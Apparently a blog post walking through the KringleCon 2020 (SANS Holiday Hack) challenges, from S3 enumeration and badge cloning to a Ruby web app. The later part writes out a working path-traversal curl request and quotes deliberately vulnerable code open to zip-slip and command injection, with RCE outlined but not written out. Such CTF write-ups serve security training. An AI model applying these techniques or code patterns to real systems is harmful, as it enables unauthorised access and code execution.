<!DOCTYPE html>
<html lang="en-us">
  <head>
    <title>KringleCon 2020 Writeup | Nikola&#39;s Blog</title>

    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">    
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="SANS Holiday Hacking Challenge">
<meta name="generator" content="Hugo 0.80.0" />


  <META NAME="ROBOTS" CONTENT="INDEX, FOLLOW">


<link rel="stylesheet" href="/css/style.css">
<link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />

 
    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-156479490-3', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>








  </head>

  <body>
    <nav class="navigation">
	
		<a href="/"> <span class="arrow">←</span>Home</a>
	
	<a href="/posts">Archive</a>
	<a href="/tags">Tags</a>
	<a href="/about">About</a>

	

	
	  <a class="button" href="https://knez.github.io/index.xml">Subscribe</a>
	
</nav>


    <main class="main">
      

<section id="single">
    <h1 class="title">KringleCon 2020 Writeup</h1>

    <div class="tip">
        <span>
          Feb 26, 2021 16:59
        </span>
        <span class="split">
          ·
        </span>
        <span>
          
            5034 words
          
        </span>
        <span class="split">
          ·
        </span>
        <span>
          24 minute read
        </span>
    </div>

    <div class="content">
      <h1 id="objective-1---uncover-santas-gift-list">Objective 1 - Uncover Santa&rsquo;s Gift List <a href="#objective-1---uncover-santas-gift-list" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>There is a photo of Santa&rsquo;s Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.</em></p>
<p>I’ve loaded the billboard image into the online photo editor <code>photopea.com</code>.
With the lasso tool selected, I’ve circled the twirly region representing the gift list. Finally, I applied a Twirl filter to undo the effect.</p>
<ol>
<li>Go to <code>Filter-&gt;Distort-&gt;Twirl</code></li>
<li>Select 360 degree angle.</li>
</ol>
<p>Before:</p>
<figure>
    <img src="/images/kringlecon-2020/before.png" width="80%"/> 
</figure>

<p>After:</p>
<figure>
    <img src="/images/kringlecon-2020/after.png" width="80%"/> 
</figure>

<p>Answer: <strong>proxmark</strong></p>
<h1 id="objective-2---investigate-s3-bucket">Objective 2 - Investigate S3 Bucket <a href="#objective-2---investigate-s3-bucket" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.</em></p>
<p>First, we are given a hint that the bucket name <em>might</em> be called <code>wrapper3000</code>. Another hint is in the wordlist itself (contains word &ldquo;wrapper&rdquo;). Let’s append this bucket name to the existing wordlist.</p>
<p><code>$ echo wrapper3000 &gt;&gt; wordlist</code></p>
<p>Now, we use the amazon bucket enumeration tool to check for all public buckets</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ ./bucket_finder.rb wordlist --download
Bucket Found: wrapper3000 <span style="color:#666">(</span> http://s3.amazonaws.com/wrapper3000 <span style="color:#666">)</span>
        &lt;Downloaded&gt; http://s3.amazonaws.com/wrapper3000/package
</code></pre></div><p>The script found the public bucket <code>wrapper3000</code> and enumerated and downloaded a public file <code>package</code> within that bucket.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ <span style="color:#a2f">cd</span> wrapper3000
$ file package
package: ASCII text, with very long lines
$ cat package
UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX
6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1
PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzw
MXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4d
LgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a
6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7l
cxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZ
GhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAA
AAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQS
wUGAAAAAAEAAQBiAAAA9QEAAAAA
</code></pre></div><p>It appears this file is an ascii text file. Peeking in, we see a base64 encoded string. Let’s decode it</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ cat package | base64 -d &gt; binfile
$ file binfile
binfile: Zip archive data, at least v1.0 to extract
</code></pre></div><p>The file is a ZIP file</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ unzip binfile
Archive:  binfile
 extracting: package.txt.Z.xz.xxd.tar.bz2
</code></pre></div><p>After unziping, we are left with the file <code>package.txt.Z.xz.xxd.tar.bz2</code>.
The exensions are telling us how the file is compressed/archived, and in which order. The package.txt is first zipped with unix Zip, then compressed with .xz, than outputed as a hexdump, archived with tar, and finally compressed with bz2.
With all that info, we can now unpack the file in one go with the following command:</p>
<p><code>$ tar -Oxjf package.txt.Z.xz.xxd.tar.bz2 | xxd -r  | xz -d | uncompress</code></p>
<p>Answer: <strong>North Pole: The Frostiest Place on Earth</strong></p>
<h1 id="objective-3---point-of-sale-password-recovery">Objective 3 - Point-of-Sale Password Recovery <a href="#objective-3---point-of-sale-password-recovery" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What&rsquo;s the password?</em></p>
<p>We start by downloading the provided .exe file <code>santa-shop.exe</code>.<br>
It&rsquo;s a self-extractable executable. To unpack it, we could make use of the <code>7zip</code> utility.</p>
<p><code>$ 7za e santa-shop.exe</code></p>
<p>Among many extracted files, we see the file <code>app.asar</code>, which is an archival format similar to tar, with metadata encoded in JSON.<br>
Using the asar package from npm, we can peek inside the archive with:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ asar list app.asar
/README.md
/index.html
/main.js
/package.json
/preload.js
/renderer.js
/style.css
/img
/img/network1.png
/img/network2.png
/img/network3.png
/img/network4.png
</code></pre></div><p>Of special interest to us is the <code>main.js</code> file, likely containing the main source of the app. Let’s extract just that file.</p>
<p><code>$ asar ef app.asar main.js</code></p>
<p>Right in the first ten lines, we see the password hardcoded as a constant</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript">$ head main.js
<span style="color:#080;font-style:italic">// Modules to control application life and create native browser window
</span><span style="color:#080;font-style:italic"></span><span style="color:#a2f;font-weight:bold">const</span> { app, BrowserWindow, ipcMain } <span style="color:#666">=</span> require(<span style="color:#b44">&#39;electron&#39;</span>);
<span style="color:#a2f;font-weight:bold">const</span> path <span style="color:#666">=</span> require(<span style="color:#b44">&#39;path&#39;</span>);

<span style="color:#a2f;font-weight:bold">const</span> SANTA_PASSWORD <span style="color:#666">=</span> <span style="color:#b44">&#39;santapass&#39;</span>;  <span style="color:#666">&lt;-----</span>
...
</code></pre></div><p>Scrolling further down the code, we can confirm this constant is being checked against the user provided password.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript">ipcMain.handle(<span style="color:#b44">&#39;unlock&#39;</span>, (event, password) =&gt; {
  <span style="color:#a2f;font-weight:bold">return</span> (password <span style="color:#666">===</span> SANTA_PASSWORD);
});
</code></pre></div><p>Answer: <strong>santapass</strong></p>
<h1 id="objective-4---operate-the-santavator">Objective 4 - Operate the Santavator <a href="#objective-4---operate-the-santavator" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Talk to Pepper Minstix in the entryway to get some hints about the Santavator.</em></p>
<p>To solve this task, we need to configure the santavator panel in such a way, so there is a single green light source emitting.</p>
<p>In order to open the panel, we need a key, which can be obtained from one of the elves by solving the Linux primer mini-challenge. Other required items were the <code>Green Bulb</code> and a <code>Broken Candycane</code>. Both of which I obtained by roaming around the castle and randomly stumbling upon them.</p>
<p>After opening the panel with the key, I’ve set up the candycane in the middle of the screen, so that it would cause the flow of electrons to split, thus creating a fork. One of the forked streams went into green input.</p>
<p>Finally, by placing the green bulb in the stream, light emitting is achieved.</p>
<figure>
    <img src="/images/kringlecon-2020/bulb.png" width="90%"/> 
</figure>

<p>Yet another way of solving this would be to hack the <code>app.js</code>.<br>
This way we could get anywhere, without having a single item in our posession.</p>
<h1 id="objective-5---open-hid-lock">Objective 5 - Open HID Lock <a href="#objective-5---open-hid-lock" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.</em></p>
<p>To access the Workshop, we have to tweak the elevator config again. This is done by turning both red and green lights on. (The red bulb was found randomly from previous world exploring).</p>
<p>While in there, we found a HID Lock. However, in order to unlock it, we need to have some sort of device capable of capturing and replaying RFID data. Luckily, such device can be found in the gift-wrapping room, located just next to the Workshop. There, we picked up the <code>proxmark3</code> device.</p>
<p>Now, the main idea is to find and clone a card with the correct access permissions, and replay that data against the HID Lock reader. We can read any elf&rsquo;s card by standing close to them, opening the proxmark3, and typing the following command:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#666">[</span>magicdust<span style="color:#666">]</span> pm3 --&gt; lf hid <span style="color:#a2f">read</span>
</code></pre></div><p>In the gift-wrapping room, I&rsquo;ve tried to clone the elf’s badge, and this gave me a facility building number <code>113</code>, and a card ID <code>6000</code>. Trying to replay those credentials yielded no results..
Next thing I’ve tried, is to play around with the card IDs by changing the number from 6000 upwards, in hopes that higher numbers mean greater access level. Again with no success.</p>
<p>From previous chat sessions with elves, I recalled one elf saying that Santa has a great <strong>trust</strong> in Shinny Upatree. So I went to him and cloned his bage. It had a card ID of <code>6025</code>.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#666">[</span>magicdust<span style="color:#666">]</span> pm3 --&gt; lf hid <span style="color:#a2f">read</span>
<span style="color:#080;font-style:italic">#db# TAG ID: 2006e22f13 (6025) - Format Len: 26 bit - FC: 113 - Card: 6025</span>
</code></pre></div><p>Going back to the HID Lock and replaying those same credentials:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#666">[</span>magicdust<span style="color:#666">]</span> pm3 --&gt; lf hid sim -w H10301 --fc <span style="color:#666">113</span> --cn <span style="color:#666">6025</span>
<span style="color:#666">[=]</span> Simulating HID tag
<span style="color:#666">[</span>+<span style="color:#666">]</span> <span style="color:#666">[</span>H10301<span style="color:#666">]</span> - HID H10301 26-bit;  FC: <span style="color:#666">113</span>  CN: <span style="color:#666">6025</span>    parity: valid
<span style="color:#666">[=]</span> Stopping simulation after <span style="color:#666">10</span> seconds.
<span style="color:#666">[=]</span> Done
</code></pre></div><p>Access granted!</p>
<h1 id="objective-6---splunk-challenge">Objective 6 - Splunk Challenge <a href="#objective-6---splunk-challenge" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?</em></p>
<p>Only Santa and few other elves have access to the Splunk terminal.<br>
In previous challenge, we unlocked the HID Locked doors. Going inside, we enter a very dark room with invisible maze-like walls. After blindly applying pathfinding, we eventually arrive at a bottom part of the room. There is a light source. When we step in, it transports us straight into Santa’s consciousness! Surreal!</p>
<p>As Santa, we head to the <em>Great room</em>, login to the Splunk terminal and the fun begins!<br>
We have to solve 7 splunk-related challenges, after which we will be given hints on how to solve the main challenge.</p>
<p>Upon completing all questions, we get a <strong>base64</strong> encoded string: <strong>7FXjP1lyfKbyDK/MChyf36h7</strong>.<br>
It is hinted that the encryption used is old, and RFC 7465 is mentioned. Googling for RFC 7465 led me to the conclusion that encryption used is most likely <strong>RC4</strong>.</p>
<p>Now all we need is a passphrase. This was hinted at too. The passphrase can be found in one of the Splunk talks by Dave Herrald - Adversary Emulation and Automation.
Fast forwarding to the last slide of the talk, there&rsquo;s a phrase: <strong>Stay Frosty</strong></p>
<p>With all that info at our disposal, it&rsquo;s time to cook some recipes!<br>
Firing up<code>CyberChef</code>, I pasted in the encoded ciphertext. In the <code>Recipe</code> section, I selected base64 decoding and applied RC4 decryption with the correct passphrase.</p>
<p><p class="markdown-image">
  <img src="/images/kringlecon-2020/rc4.png" alt="rc4"  />
</p></p>
<p>Answer: <strong>The Lollipop Guild</strong></p>
<h1 id="objective-7---sleighs-can-d-bus-problem">Objective 7 - Sleigh&rsquo;s CAN-D-BUS Problem <a href="#objective-7---sleighs-can-d-bus-problem" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Jack Frost is somehow inserting malicious messages onto the sleigh&rsquo;s CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.</em></p>
<p>First things first, to access the challenge, we need to become Santa.<br>
Afterwards, we are presented with a terminal connected to sleigh&rsquo;s CAN-D bus, where we can debug and filter-out various messages. The goal is to find Jack&rsquo;s malicious messages and filter them out. According to elves, inserted code is causing odd door behaviour and brakes sometimes crumble. (This is a useful hint)</p>
<p>There are many messages on the screen, it&rsquo;s easy to get lost. A good way to approach this task, is to start systematically turning off each messsage, until there is no activity on the screen. Then, we can start turning on each message again one by one, see what it does, and map its message ID to a corresponding function. Fiddling around with buttons and sliders will help us determine functionality.</p>
<p>After some time of analyzing, I compiled this list of message IDs and their function</p>
<table>
<thead>
<tr>
<th>Message</th>
<th style="text-align:center">ID</th>
<th style="text-align:center">Value</th>
<th style="text-align:left">Note</th>
</tr>
</thead>
<tbody>
<tr>
<td>Door LOCK</td>
<td style="text-align:center">19B</td>
<td style="text-align:center">00000000</td>
<td style="text-align:left">Locks the doors</td>
</tr>
<tr>
<td>Door UNLOCK</td>
<td style="text-align:center">19B</td>
<td style="text-align:center">0F000000</td>
<td style="text-align:left">Unlocks the doors</td>
</tr>
<tr>
<td>Door (error)</td>
<td style="text-align:center">19B</td>
<td style="text-align:center">000F2057</td>
<td style="text-align:left"><strong>Malcode! Odd door behaviour</strong></td>
</tr>
<tr>
<td>Steering</td>
<td style="text-align:center">019</td>
<td style="text-align:center">000000XX</td>
<td style="text-align:left">Negative value = left, positive = right</td>
</tr>
<tr>
<td>Engine ON</td>
<td style="text-align:center">02A</td>
<td style="text-align:center">0000FF00</td>
<td style="text-align:left">Starts the engine</td>
</tr>
<tr>
<td>Engine OFF</td>
<td style="text-align:center">02A</td>
<td style="text-align:center">000000FF</td>
<td style="text-align:left">Shuts down the engine</td>
</tr>
<tr>
<td>Engine RUNNING</td>
<td style="text-align:center">244</td>
<td style="text-align:center">0000XXXX</td>
<td style="text-align:left">Values change according to acceleration</td>
</tr>
<tr>
<td>Brakes</td>
<td style="text-align:center">080</td>
<td style="text-align:center">000000XX</td>
<td style="text-align:left">Last byte represents brake pressure</td>
</tr>
<tr>
<td>Brakes (error)</td>
<td style="text-align:center">080</td>
<td style="text-align:center">00FFFFFX</td>
<td style="text-align:left"><strong>Malcode! Brakes crumbling above certain value</strong></td>
</tr>
<tr>
<td>N/A</td>
<td style="text-align:center">188</td>
<td style="text-align:center">N/A</td>
<td style="text-align:left">N/A</td>
</tr>
</tbody>
</table>
<p>The doors only have <strong>two</strong> states (open/closed). Clearly, the message <code>19B#0F2057</code> is malicious.<br>
The problem with the brakes is that after a certain value (4+), additional messages are getting injected (<code>019#FFFFFX</code>). Note: this injected value is actually a <strong>negative</strong> number (all numbers are signed integers). Because of this, brakes are crumbling.</p>
<p>To prevents this, we need to setup two exclusion filters:</p>
<ol>
<li>ID 19B == 0F2057</li>
<li>ID 080  &lt; 000000</li>
</ol>
<p><p class="markdown-image">
  <img src="/images/kringlecon-2020/sleigh.png" alt="sleigh"  />
</p></p>
<h1 id="objective-8---broken-tag-generator">Objective 8 - Broken Tag Generator <a href="#objective-8---broken-tag-generator" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.</em></p>
<p>The main purpose of this task is to find the value of the environment variable <code>GREETZ</code> from the <code>Tag Generator</code> web app. We are given several hints on how to approach the task, but perhaps the most important one suggests obtaining the source code of the app.</p>
<h2 id="reconnaissance">Reconnaissance <a href="#reconnaissance" class="anchor">🔗</a></h2><p>Starting with the url, I deliberately typed the wrong non-existent url, just to see how the server responds. Interestingly, it appears the server leaks a lot of critical information.</p>
<p><code>https://tag-generator.kringlecastle.com/asd</code></p>
<p>Response:</p>
<p><code>Error in /app/lib/app.rb: Route not found</code></p>
<p>From this, we can deduce what backed the app is written in (Ruby) and the actual absolute path to what seems to be the main controller script. Our goal now is to somehow fetch this <code>app.rb</code></p>
<p>After further digging and tinkering around in the html source code I figured an interesting endpoint <code>/image</code>. This endpoint accepts the <code>id</code> parameter, which is then used to display an arbitrary uploaded image. 
There is one problem with this endpoint though. It is vulnerable to the <code>directory path traversal</code> attack. Typing the following url returned an HTTP 200 OK status.</p>
<p><code>https://tag-generator.kringlecastle.com/image?id=../../../app/lib/app.rb</code></p>
<p>Great! However, there’s a catch. Although the response was valid, we still don’t see the actual script contents. If we examine the returned HTTP header closely, we can see that the field <code>Content-Type</code> is set to <code>image/jpeg</code>. This will cause our browser to try and &ldquo;help&rdquo; us by forcing the returned content to be displayed as an image. Since our script is not an image, we see a default image placeholder.</p>
<p>To bypass this <em>limitation</em>, we can utilize the <code>cURL</code> command, which effectively ignores all browser conventions.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ curl https://tag-generator.kringlecastle.com/image?id<span style="color:#666">=</span>../../../app/lib/app.rb
</code></pre></div><p>Bingo, we got the source!</p>
<h2 id="analyzing-source-code">Analyzing source code <a href="#analyzing-source-code" class="anchor">🔗</a></h2><p>The app is written in Ruby and uses a <code>sinatra</code> lightweight web framework.
There are multiple vulnerable spots in the code. Here I will list only excerpts.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby">get <span style="color:#b44">&#39;/image&#39;</span> <span style="color:#a2f;font-weight:bold">do</span>
  <span style="color:#a2f;font-weight:bold">if</span> <span style="color:#666">!</span>params<span style="color:#666">[</span><span style="color:#b44">&#39;id&#39;</span><span style="color:#666">]</span>
    <span style="color:#a2f;font-weight:bold">raise</span> <span style="color:#b44">&#39;ID is missing!&#39;</span>
  <span style="color:#a2f;font-weight:bold">end</span>

  <span style="color:#080;font-style:italic"># Validation is boring! --Jack</span>
  <span style="color:#080;font-style:italic"># if params[&#39;id&#39;] !~ /^[a-zA-Z0-9._-]+$/</span>
  <span style="color:#080;font-style:italic">#   return 400, &#39;Invalid id! id may contain letters, numbers, period, underscore, and hyphen&#39;</span>
  <span style="color:#080;font-style:italic"># end</span>

  content_type <span style="color:#b44">&#39;image/jpeg&#39;</span>

  filename <span style="color:#666">=</span> <span style="color:#b44">&#34;</span><span style="color:#b68;font-weight:bold">#{</span> <span style="color:#800">FINAL_FOLDER</span> <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">/</span><span style="color:#b68;font-weight:bold">#{</span> params<span style="color:#666">[</span><span style="color:#b44">&#39;id&#39;</span><span style="color:#666">]</span> <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>

  <span style="color:#a2f;font-weight:bold">if</span> <span style="color:#800">File</span><span style="color:#666">.</span>exists?(filename)
    <span style="color:#a2f;font-weight:bold">return</span> <span style="color:#800">File</span><span style="color:#666">.</span>read(filename)
  <span style="color:#a2f;font-weight:bold">else</span>
    <span style="color:#a2f;font-weight:bold">return</span> <span style="color:#666">404</span>, <span style="color:#b44">&#34;Image not found!&#34;</span>
  <span style="color:#a2f;font-weight:bold">end</span>
<span style="color:#a2f;font-weight:bold">end</span>
</code></pre></div><p>Above chunk of code just confirms our earlier directory path traversal attack. Because of lack of any kind of validation, we were able to fetch any arbitrary file from any location</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#a2f;font-weight:bold">def</span> <span style="color:#00a000">handle_zip</span>(filename)
  <span style="color:#800">LOGGER</span><span style="color:#666">.</span>debug(<span style="color:#b44">&#34;Processing </span><span style="color:#b68;font-weight:bold">#{</span> filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44"> as a zip&#34;</span>)
  out_files <span style="color:#666">=</span> <span style="color:#666">[]</span>

  <span style="color:#800">Zip</span><span style="color:#666">::</span><span style="color:#800">File</span><span style="color:#666">.</span>open(filename) <span style="color:#a2f;font-weight:bold">do</span> <span style="color:#666">|</span>zip_file<span style="color:#666">|</span>
    <span style="color:#080;font-style:italic"># Handle entries one by one</span>
    zip_file<span style="color:#666">.</span>each <span style="color:#a2f;font-weight:bold">do</span> <span style="color:#666">|</span>entry<span style="color:#666">|</span>
      <span style="color:#800">LOGGER</span><span style="color:#666">.</span>debug(<span style="color:#b44">&#34;Extracting </span><span style="color:#b68;font-weight:bold">#{</span>entry<span style="color:#666">.</span>name<span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>)

      <span style="color:#a2f;font-weight:bold">if</span> entry<span style="color:#666">.</span>size <span style="color:#666">&gt;</span> <span style="color:#800">MAX_SIZE</span>
        <span style="color:#a2f;font-weight:bold">raise</span> <span style="color:#b44">&#39;File too large when extracted&#39;</span>
      <span style="color:#a2f;font-weight:bold">end</span>

      <span style="color:#a2f;font-weight:bold">if</span> entry<span style="color:#666">.</span>name()<span style="color:#666">.</span>end_with?(<span style="color:#b44">&#39;zip&#39;</span>)
        <span style="color:#a2f;font-weight:bold">raise</span> <span style="color:#b44">&#39;Nested zip files are not supported!&#39;</span>
      <span style="color:#a2f;font-weight:bold">end</span>

      <span style="color:#080;font-style:italic"># I wonder what this will do? --Jack</span>
      <span style="color:#080;font-style:italic"># if entry.name !~ /^[a-zA-Z0-9._-]+$/</span>
      <span style="color:#080;font-style:italic">#   raise &#39;Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen&#39;</span>
      <span style="color:#080;font-style:italic"># end</span>

      <span style="color:#080;font-style:italic"># We want to extract into TMP_FOLDER</span>
      out_file <span style="color:#666">=</span> <span style="color:#b44">&#34;</span><span style="color:#b68;font-weight:bold">#{</span> <span style="color:#800">TMP_FOLDER</span> <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">/</span><span style="color:#b68;font-weight:bold">#{</span> entry<span style="color:#666">.</span>name <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>

      <span style="color:#080;font-style:italic"># Extract to file or directory based on name in the archive</span>
      entry<span style="color:#666">.</span>extract(out_file) {
        <span style="color:#080;font-style:italic"># If the file exists, simply overwrite</span>
        <span style="color:#a2f">true</span>
      }

      <span style="color:#080;font-style:italic"># Process it</span>
      out_files <span style="color:#666">&lt;&lt;</span> process_file(out_file)
    <span style="color:#a2f;font-weight:bold">end</span>
  <span style="color:#a2f;font-weight:bold">end</span>

  <span style="color:#a2f;font-weight:bold">return</span> out_files
<span style="color:#a2f;font-weight:bold">end</span>
</code></pre></div><p>This piece of code is responsible for handling zip files. It opens up the archive, and extracts each file into <code>/tmp/&lt;filename&gt;</code>. As with the previous function, there is no validation of the zip file entries. Using a hex editor, a malicious attacker can craft a special zip file with filename <code>../../../some_filename</code> and cause the <code>some_filename</code> to be extracted at an arbitrary writable location.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#a2f;font-weight:bold">def</span> <span style="color:#00a000">process_file</span>(filename)
  out_files <span style="color:#666">=</span> <span style="color:#666">[]</span>

  <span style="color:#a2f;font-weight:bold">if</span> filename<span style="color:#666">.</span>downcase<span style="color:#666">.</span>end_with?(<span style="color:#b44">&#39;zip&#39;</span>)
    <span style="color:#080;font-style:italic"># Append the list returned by handle_zip</span>
    out_files <span style="color:#666">+=</span> handle_zip(filename)
  <span style="color:#a2f;font-weight:bold">elsif</span> filename<span style="color:#666">.</span>downcase<span style="color:#666">.</span>end_with?(<span style="color:#b44">&#39;jpg&#39;</span>) <span style="color:#666">||</span> filename<span style="color:#666">.</span>downcase<span style="color:#666">.</span>end_with?(<span style="color:#b44">&#39;jpeg&#39;</span>) <span style="color:#666">||</span> filename<span style="color:#666">.</span>downcase<span style="color:#666">.</span>end_with?(<span style="color:#b44">&#39;png&#39;</span>)
    <span style="color:#080;font-style:italic"># Append the name returned by handle_image</span>
    out_files <span style="color:#666">&lt;&lt;</span> handle_image(filename)
  <span style="color:#a2f;font-weight:bold">else</span>
    <span style="color:#a2f;font-weight:bold">raise</span> <span style="color:#b44">&#34;Unsupported file type: </span><span style="color:#b68;font-weight:bold">#{</span> filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>
  <span style="color:#a2f;font-weight:bold">end</span>

  <span style="color:#a2f;font-weight:bold">return</span> out_files
<span style="color:#a2f;font-weight:bold">end</span>
</code></pre></div><p>This function is correct. It&rsquo;s worth pointing out that it validates filename extension by checking if the filename ends with that specific extension, and based on that passes the filename to the proper handler. This info will come handy later when crafting the payload.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#a2f;font-weight:bold">def</span> <span style="color:#00a000">handle_image</span>(filename)
  out_filename <span style="color:#666">=</span> <span style="color:#b44">&#34;</span><span style="color:#b68;font-weight:bold">#{</span> <span style="color:#800">SecureRandom</span><span style="color:#666">.</span>uuid <span style="color:#b68;font-weight:bold">}#{</span><span style="color:#800">File</span><span style="color:#666">.</span>extname(filename)<span style="color:#666">.</span>downcase<span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>
  out_path <span style="color:#666">=</span> <span style="color:#b44">&#34;</span><span style="color:#b68;font-weight:bold">#{</span> <span style="color:#800">FINAL_FOLDER</span> <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">/</span><span style="color:#b68;font-weight:bold">#{</span> out_filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>

  <span style="color:#080;font-style:italic"># Resize and compress in the background</span>
  <span style="color:#800">Thread</span><span style="color:#666">.</span>new <span style="color:#a2f;font-weight:bold">do</span>
    <span style="color:#a2f;font-weight:bold">if</span> <span style="color:#666">!</span><span style="color:#a2f">system</span>(<span style="color:#b44">&#34;convert -resize 800x600</span><span style="color:#b62;font-weight:bold">\\</span><span style="color:#b44">&gt; -quality 75 &#39;</span><span style="color:#b68;font-weight:bold">#{</span> filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#39; &#39;</span><span style="color:#b68;font-weight:bold">#{</span> out_path <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#39;&#34;</span>)
      <span style="color:#800">LOGGER</span><span style="color:#666">.</span>error(<span style="color:#b44">&#34;Something went wrong with file conversion: </span><span style="color:#b68;font-weight:bold">#{</span> filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>)
    <span style="color:#a2f;font-weight:bold">else</span>
      <span style="color:#800">LOGGER</span><span style="color:#666">.</span>debug(<span style="color:#b44">&#34;File successfully converted: </span><span style="color:#b68;font-weight:bold">#{</span> filename <span style="color:#b68;font-weight:bold">}</span><span style="color:#b44">&#34;</span>)
    <span style="color:#a2f;font-weight:bold">end</span>
  <span style="color:#a2f;font-weight:bold">end</span>

  <span style="color:#080;font-style:italic"># Return just the filename - we can figure that out later</span>
  <span style="color:#a2f;font-weight:bold">return</span> out_filename
<span style="color:#a2f;font-weight:bold">end</span>
</code></pre></div><p>Here lies the main pitfall. On the <strong>7th</strong> line, we see a <code>system()</code> function being called. It accepts a <code>filename</code> as an argument, which is a user controllable variable. If we can just craft a special input filename, we could trigger a <code>Remote Code Execution</code> (RCE) and use it to obtain the system environment variable.</p>
